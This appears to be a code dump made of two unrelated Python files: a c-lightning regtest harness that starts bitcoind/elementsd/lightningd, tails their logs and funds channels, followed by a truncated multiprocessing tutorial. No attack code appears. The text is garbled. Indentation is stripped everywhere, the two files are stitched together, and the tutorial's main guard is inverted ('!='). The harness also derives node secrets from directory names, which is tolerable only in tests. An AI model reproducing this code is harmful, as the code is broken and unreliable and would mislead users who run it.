f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
                self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
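# A minimal sketch of subclassing TailableProc the way the daemon wrappers below do:
# set cmd_line and prefix, start(), then block on wait_for_log(). The bash command and
# the log pattern here are illustrative, not tied to any real daemon.
class _ExampleEchoProc(TailableProc):
    def __init__(self, output_dir=None):
        TailableProc.__init__(self, output_dir, verbose=False)
        # Print a marker line, then stay alive until stop() terminates us.
        self.cmd_line = ['bash', '-c', 'echo ready to serve; sleep 30']
        self.prefix = 'echo-example'

def _example_tail_until_ready():
    proc = _ExampleEchoProc()
    proc.start()
    proc.wait_for_log('ready to serve')
    return proc.stop()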
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'vipstarcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'vipstarcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'vipstarcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that tx's that become invalid at [height] (because of coin maturity, locktime,
        etc.) are removed from the mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
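# A brief sketch of exercising simple_reorg from a test, assuming `bitcoind` is a started
# BitcoinD instance: mine a few blocks, then fork two blocks back and re-mine.
def _example_reorg(bitcoind):
    bitcoind.generate_block(5)
    tip = bitcoind.rpc.getblockcount()
    # Invalidate the last two blocks and extend a replacement chain past the old tip.
    return bitcoind.simple_reorg(tip - 1)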
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generate(numblocks)
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': config.get('TEST_NETWORK', 'regtest'),
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
        # wait for sendpay to complete
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) * 1000)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
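# A compact sketch of the typical two-node flow these helpers support, assuming the
# pytest `node_factory` fixture is built from NodeFactory below; amounts are illustrative.
def _example_two_node_payment(node_factory):
    l1, l2 = node_factory.line_graph(2, fundamount=10**6, wait_for_announce=True)
    l1.pay(l2, 100000)  # amount in millisatoshi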
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None, allow_broken_log=False,
wait_for_bitcoind_sync=True, allow_bad_gossip=False):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
# Get the DB backend DSN we should be using for this test and this node.
db = self.db_provider.get_db(lightning_dir, self.testname, node_id)
dsn = db.get_dsn()
if dsn is not None:
daemon.opts['wallet'] = dsn
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect, allow_broken_log=allow_broken_log,
allow_bad_gossip=allow_bad_gossip, db=db)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
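
# Minimal usage sketch, assuming a test fixture provides an instance of the NodeFactory
# above (illustrative only, not part of the original module).
def example_three_node_line(node_factory):
    """Spin up l1 -> l2 -> l3 with funded, announced channels and return the nodes."""
    l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
    return l1, l2, l3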
|
C10_mprocess.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'Multiprocessing exercises'
__author__ = 'Jacklee'
#
# Several ways to implement multiprocessing
# How to launch external processes
# How to communicate between processes
#
# 1. Use fork() to create multiple processes
# Note: only available on systems with a Unix/Linux kernel
import os
# os.getpid() returns the PID of the current process
# print('Process (%s) start...' % os.getpid())
# os.fork() copies the current process; the copy becomes a child of the current process
# Note: fork() is called once but returns twice -- the parent receives the child's PID, the child receives 0
# pid = os.fork()
# if pid == 0:
# print('I am child process (%s) and my parent is %s.' % (os.getpid(), os.getppid()))
# else:
# print('I (%s) just created a child process (%s).' % (os.getpid(), pid))
# 2. Use the multiprocessing module
# Works across platforms
from multiprocessing import Process
import os
# Code executed in the child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
# Creating a process with the Process class
if __name__ != '__main__':
print('Parent process %s.' % os.getpid())
    # Create a child process
    # Process is a class derived from BaseProcess
    # group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
    # join() waits for the child process to finish before continuing; commonly used to synchronize processes
p.join()
print('Child process End.')
# Creating processes with a process pool
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s).' % (name, os.getpid()))
start = time.time()
    # time.sleep() suspends execution for a while
time.sleep(random.random() * 3)
end = time.time()
